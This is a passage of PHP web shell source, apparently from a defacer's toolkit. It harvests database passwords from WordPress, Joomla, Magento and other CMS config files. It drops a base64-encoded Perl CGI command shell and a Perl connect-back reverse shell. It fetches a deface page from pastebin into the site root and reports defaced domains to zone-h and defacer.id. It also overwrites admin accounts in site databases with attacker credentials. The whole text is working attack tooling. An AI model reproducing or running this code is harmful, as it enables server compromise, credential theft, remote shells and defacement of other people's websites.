  868. $dira = scandir($dir);
  869. foreach($dira as $dirb) {
  870. if(!is_file("$dir/$dirb")) continue;
  871. $ambil = file_get_contents("$dir/$dirb");
  872. if(preg_match("/WordPress/", $ambil)) {
  873. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  874. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  875. $pass .= ambilkata($ambil,"password = '","'")."\n";
  876. }
  877.  
  878. elseif(preg_match("/konekDB/", $ambil)) {
  879. $pass .= ambilkata($ambil,"$password = '","'")."\n";
  880. }
  881.  
  882. elseif(preg_match("/cmsmember/", $ambil)) {
  883. $pass .= ambilkata($ambil,'dbpasswd = "','"')."\n";
  884. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  885. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  886. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  887. $pass .= ambilkata($ambil,'password = "','"')."\n";
  888. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  889. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  890. } elseif(preg_match("/client/", $ambil)) {
  891. preg_match("/password=(.*)/", $ambil, $pass1);
  892. if(preg_match('/"/', $pass1[1])) {
  893. $pass1[1] = str_replace('"', "", $pass1[1]);
  894. $pass .= $pass1[1]."\n";
  895. }
  896. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  897. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  898. }
  899. }
  900. echo $pass;
  901. }
  902. $cp_pass = cp_pass($dir);
  903. echo $cp_pass;
  904. echo "</textarea><br>
  905. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  906. </form>
  907. <br></center>";
  908. }
  909. }elseif(isset($_GET['do']) && ($_GET['do'] == 'cgi')) {
  910. echo "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1 Bypass Exploit]==--+ </font></b><br><br>";
  911. mkdir('cgitelnet1', 0755);
  912. chdir('cgitelnet1');
  913. $kokdosya = ".htaccess";
  914. $dosya_adi = "$kokdosya";
  915. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  916. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  917.  
  918. AddType application/x-httpd-cgi .cin
  919.  
  920. AddHandler cgi-script .cin
  921. AddHandler cgi-script .cin";
  922. fwrite ( $dosya , $metin ) ;
  923. fclose ($dosya);
  924. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBSZWNvZGVkIEJ5IDB4MTk5OQoKJFdpbk5UID0gMDsKJE5UQ21kU2VwID0gIiYiOwokVW5peENtZFNlcCA9ICI7IjsKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsKJFNob3dEeW5hbWljT3V0cHV0ID0gMTsKJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7CiRDbWRQd2QgPSAoJFdpbk5UID8gImNkIiA6ICJwd2QiKTsKJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7CiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7CnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCXByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOwoJcHJpbnQgPDxFTkQ7CjxodG1sPgo8aGVhZD4KPHRpdGxlPkNHSS1UZWxuZXQgVmVyc2lvbiAxLjA8L3RpdGxlPgokSHRtbE1ldGFIZWFkZXIKPC9oZWFkPgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBBMEEwQSIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT48YnI+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPC9mb250PjwvYm9keT48L2h0bWw+IjsKfQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CnN1YiBFeGVjdXRlQ29tbWFuZAp7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsKCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkICQxIi4kQ21kU2VwLiRDbWRQd2Q7CgkJY2hvcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRPbGREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkT2xkRGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+IjsKCX0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dAoJewoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsKCQlwcmludCAiPGNvZGU+JFByb21wdCAkUnVuQ29tbWFuZDwvY29kZT48eG1wPiI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiRSdW5Db21tYW5kLiRSZWRpcmVjdG9yOwoJCWlmKCEkV2luTlQpCgkJewoJCQkkU0lHeydBTFJNJ30gPSBcJkNvbW1hbmRUaW1lb3V0OwoJCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7CgkJfQoJCWlmKCRTaG93RHluYW1pY091dHB1dCkgIyBzaG93IG91dHB1dCBhcyBpdCBpcyBnZW5lcmF0ZWQKCQl7CgkJCSR8PTE7CgkJCSRDb21tYW5kIC49ICIgfCI7CgkJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOwoJCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJCXsKCQkJCSRfID1+IHMvKFxufFxyXG4pJC8vOwoJCQkJcHJpbnQgIiRfXG4iOwoJCQl9CgkJCSR8PTA7CgkJfQoJCWVsc2UgIyBzaG93IG91dHB1dCBhZnRlciBjb21tYW5kIGNvbXBsZXRlcwoJCXsKCQkJcHJpbnQgYCRDb21tYW5kYDsKCQl9CgkJaWYoISRXaW5OVCkKCQl7CgkJCWFsYXJtKDApOwoJCX0KCQlwcmludCAiPC94bXA+IjsKCX0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJJlByaW50UGFnZUZvb3RlcjsKfQomUmVhZFBhcnNlOwomR2V0Q29va2llczsKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwoKJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsKJFRyYW5zZmVyRmlsZSA9ICRpbnsnZid9OwokT3B0aW9ucyA9ICRpbnsnbyd9OwokQWN0aW9uID0gJGlueydhJ307CiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7CiRDdXJyZW50RGlyID0gJGlueydkJ307CmNob3AoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsKaWYoJEFjdGlvbiBlcSAiY29tbWFuZCIpICMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZFeGVjdXRlQ29tbWFuZDsKfQo=';
  925.  
  926. $file = fopen("izo.cin" ,"w+");
  927. $write = fwrite ($file ,base64_decode($cgishellizocin));
  928. fclose($file);
  929. chmod("izo.cin",0755);
  930. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
  931. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
  932. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
  933. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
  934. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
  935. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
  936. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
  937. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
  938. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
  939. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
  940. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
  941. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
  942. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
  943. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
  944. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
  945. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
  946. YXRhY2hlZFxuXG4iOw==';
  947.  
  948. $file = fopen("dc.pl" ,"w+");
  949. $write = fwrite ($file ,base64_decode($netcatshell));
  950. fclose($file);
  951. chmod("dc.pl",0755);
  952. echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe>
  953.  
  954.  
  955. </div>";
  956.  
  957.  
  958. }
  959.  
  960. elseif(isset($_GET['do']) && ($_GET['do'] == 'deleteme')) {
  961. unlink(__FILE__);
  962. echo "<script>window.location='./';</script>";
  963. }
  964. elseif(isset($_GET['do']) && ($_GET['do'] == 'mirror')) {
  965. if($_POST['arsip'] == '1') {
  966. $domain = explode("\r\n", $_POST['url']);
  967. $nick = $_POST['nick'];
  968. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  969. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  970. function zoneh($url,$nick) {
  971. $ch = curl_init("http://www.zone-h.com/notify/single");
  972. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  973. curl_setopt($ch, CURLOPT_POST, true);
  974. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  975. return curl_exec($ch);
  976. curl_close($ch);
  977. }
  978. foreach($domain as $url) {
  979. $zoneh = zoneh($url,$nick);
  980. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  981. echo "$url -> <font color=lime>OK</font><br>";
  982. } else {
  983. echo "$url -> <font color=red>ERROR</font><br>";
  984. }
  985. }
  986. } if($_POST['arsip'] == '2') {
  987. $site = explode("\r\n", $_POST['sites']);
  988. $hekel = $_POST['nick'];
  989. $tim = $_POST['tim'];
  990. foreach($site as $sites) {
  991. $zh = $sites;
  992. $form_url = "https://www.defacer.id/notify";
  993. $data_to_post = array();
  994. $data_to_post['attacker'] = "$hekel";
  995. $data_to_post['team'] = "$tim";
  996. $data_to_post['poc'] = 'SQL Injection';
  997. $data_to_post['url'] = "$zh";
  998. $curl = curl_init();
  999. curl_setopt($curl,CURLOPT_URL, $form_url);
  1000. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  1001. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  1002. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  1003. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1004. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  1005. $result = curl_exec($curl);
  1006. echo $result;
  1007. curl_close($curl);
  1008. echo "<br>";
  1009. }
  1010.  
  1011. }
  1012. else {
  1013. echo "
  1014. <script type='text/javascript'>//<![CDATA[
  1015. window.onload=function(){
  1016. document.getElementById('arsip').addEventListener('change', function () {
  1017. var style = this.value == 2 ? 'block' : 'none';
  1018. document.getElementById('defacerid').style.display = style;
  1019. });
  1020. }//]]>
  1021.  
  1022. </script><center>
  1023. <form method='post'>
  1024. <select class='select' id='arsip' name='arsip' style='width: 450px;' height='10'>
  1025. <option value='1'>Zone-h</option>
  1026. <option value='2'>Defacer ID</option></select><br>
  1027. <u>Defacer</u>: <br>
  1028. <input type='text' name='nick' size='50' value='0x1999'><br>
  1029. <div id='defacerid' style='display: none;'><br>
  1030. <u>Team</u>:<br>
  1031. <input type='text' name='tim' size='50' value='Indonesian Code Party'><br><br>
  1032. </div>
  1033. <u>Domains</u>: <br>
  1034. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1035. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1036. </form>";
  1037. }
  1038. echo "</center>";
  1039. }
  1040.  
  1041. elseif(isset($_GET['do']) && ($_GET['do'] == 'hek')) {
  1042. $url="http://" . $_SERVER['SERVER_NAME']."/0x.htm";
  1043. $hh=$_SERVER['DOCUMENT_ROOT']."/0x.htm";
  1044. @file_put_contents($hh ,file_get_contents("http://pastebin.com/raw/PDcuwBug"));
  1045. function zoneh($url,$nick) {
  1046. $ch = curl_init("http://www.zone-h.com/notify/single");
  1047. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1048. curl_setopt($ch, CURLOPT_POST, true);
  1049. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1050. return curl_exec($ch);
  1051. curl_close($ch);
  1052. }
  1053. $zoneh = zoneh($url,"0x1999");
  1054. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1055. echo "$url -> <font color=lime>OK</font><br>";
  1056. } else {
  1057. echo "$url -> <font color=red>ERROR</font><br>";
  1058. }
  1059. }
  1060. elseif(isset($_GET['do']) && ($_GET['do'] == 'crp')) {
  1061. if($_POST['gass']) {
  1062. echo "<center><h1>Config Reset Password</h1>
  1063. <form method='post'>
  1064. Link Config: <br>
  1065. <textarea name='link' style='width: 450px; height:250px;'>";
  1066. UrlLoop($_POST['linkconf'],$_POST['tipe']);
  1067. echo"</textarea><br>
  1068. <input type='submit' style='width: 450px;' name='ngentuconfig' value='Hajar!!'>
  1069. </form></center>";
  1070. }else {
  1071. echo '<center>
  1072. <h1>Config Reset Password</h1>
  1073. <form method="post">
  1074. Select Type :<br><select class="select" name="tipe" style="width: 450px;" height="10">
  1075. <option value="Wordpress">Wordpress</option>
  1076. <option value="Joomla">Joomla</option>
  1077. <option value="Lokomedia">Lokomedia</option>
  1078. <option value="Magento">Magento</option>
  1079. <option value="OpenCart">OpenCart</option>
  1080. <option value="txt">All Config</option>
  1081. </select><br>
  1082. Link Config :<br>
  1083. <input type="text" name="linkconf" height="10" style="width: 450px;" placeholder="http://0xdark.com/cox_symconf/"><br>
  1084. <input type="submit" style="width: 450px;" name="gass" value="Hajar!!">
  1085. </form></center>';
  1086. }
  1087. if($_POST['ngentuconfig']) {
  1088. echo "<center><table style='width:100%'>
  1089. <tr>
  1090. <th>CMS</th>
  1091. <th>User</th>
  1092. <th>Password</th>
  1093. <th>Login</th>
  1094. <th>Config</th>
  1095. </tr>";
  1096. $user = '0x1999';
  1097. $pass = "0x1999";
  1098. $passx = md5($pass);
  1099. $link = explode("\r\n", $_POST['link']);
  1100.  
  1101. foreach($link as $file_conf) {
  1102. $config = file_get_contents($file_conf);
  1103. if(preg_match("/JConfig|joomla/",$config)) {
  1104. $dbhost = ambilkata($config,"host = '","'");
  1105. $dbuser = ambilkata($config,"user = '","'");
  1106. $dbpass = ambilkata($config,"password = '","'");
  1107. $dbname = ambilkata($config,"db = '","'");
  1108. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1109. $prefix = $dbprefix."users";
  1110. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1111. $db = mysql_select_db($dbname);
  1112. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1113. $result = mysql_fetch_array($q);
  1114. $id = $result['id'];
  1115. $site = ambilkata($config,"sitename = '","'");
  1116. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1117. echo "<tr><td>Joomla</td>";
  1118. //echo "[ ".$file_conf." ]<br>";
  1119. //echo "CMS => Joomla<br>";
  1120. if($site == '') {
  1121. $url_target = "<font color=red>ERROR</font><br>";
  1122. } else {
  1123. $url_target=$site;
  1124. }
  1125. if(!$update) {
  1126. echo "<td><font color=red>".mysql_error()."</font></td><td>Update Error</td><td>!</td><td>".$file_conf."</td>";
  1127. }
  1128. elseif(!$conn){
  1129. echo "<td><font color=red>".mysql_error()."</font></td><td>Connection Error</td><td>!</td><td>".$file_conf."</td>";
  1130. }
  1131. elseif (!$db){
  1132. echo "<td><font color=red>".mysql_error()."</font></td><td>DB Error</td><td>!</td><td>".$file_conf."</td>";
  1133. }
  1134. else {
  1135. echo "<td><font color=lime>$user</font></td>";
  1136. echo "<td><font color=lime>$pass</font></td>";
  1137. echo "<td><a href=\"https://www.google.com/search?source=hp&q='$url_target'\" target=\"_BLANK\">$url_target</a></td>";
  1138. echo "<td>".$file_conf."</td>";
  1139. }
  1140. echo "</tr>";
  1141. mysql_close($conn);
  1142. } elseif(preg_match("/WordPress/",$config)) {
  1143. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1144. $dbuser = ambilkata($config,"DB_USER', '","'");
  1145. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1146. $dbname = ambilkata($config,"DB_NAME', '","'");
  1147. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1148. $prefix = $dbprefix."users";
  1149. $option = $dbprefix."options";
  1150. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1151. $db = mysql_select_db($dbname);
  1152. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1153. $result = mysql_fetch_array($q);
  1154. $id = $result[ID];
  1155. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1156. $result2 = mysql_fetch_array($q2);
  1157. $target = $result2[option_value];
  1158. if($target == '') {
  1159. $url_target = "<font color=red>DOMAIN ERROR</font>";
  1160. } else {
  1161. $url_target = "<a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a>";
  1162. }
  1163. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE id='$id'");
  1164. echo "<tr><td>Wordpress</td>";
  1165. //echo "[ ".$file_conf." ]<br>";
  1166. //echo $url_target;
  1167. if(!$update OR !$conn OR !$db) {
  1168. echo "<td><font color=red>".mysql_error()."</font></td><td>!</td><td>!</td><td>".$file_conf."</td>";
  1169. } else {
  1170. echo "<td><font color=lime>$user</font></td>";
  1171. echo "<td><font color=lime>$pass</font></td>";
  1172. echo "<td>$url_target</td>";
  1173. echo "<td>".$file_conf."</td>";
  1174. }
  1175. echo "</tr>";
  1176. mysql_close($conn);
  1177. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1178. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1179. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1180. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1181. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1182. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1183. $prefix = $dbprefix."admin_user";
  1184. $option = $dbprefix."core_config_data";
  1185. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1186. $db = mysql_select_db($dbname);
  1187. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1188. $result = mysql_fetch_array($q);
  1189. $id = $result[user_id];
  1190. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1191. $result2 = mysql_fetch_array($q2);
  1192. $target = $result2[value];
  1193. if($target == '') {
  1194. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1195. } else {
  1196. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1197. }
  1198. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1199. echo "[ ".$file_conf." ]<br>";
  1200. echo "CMS => Magento<br>";
  1201. echo $url_target;
  1202. if(!$update OR !$conn OR !$db) {
  1203. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1204. } else {
  1205. echo "[+] username: <font color=lime>$user</font><br>";
  1206. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1207. }
  1208. mysql_close($conn);
  1209. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1210. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1211. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1212. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1213. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1214. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1215. $prefix = $dbprefix."user";
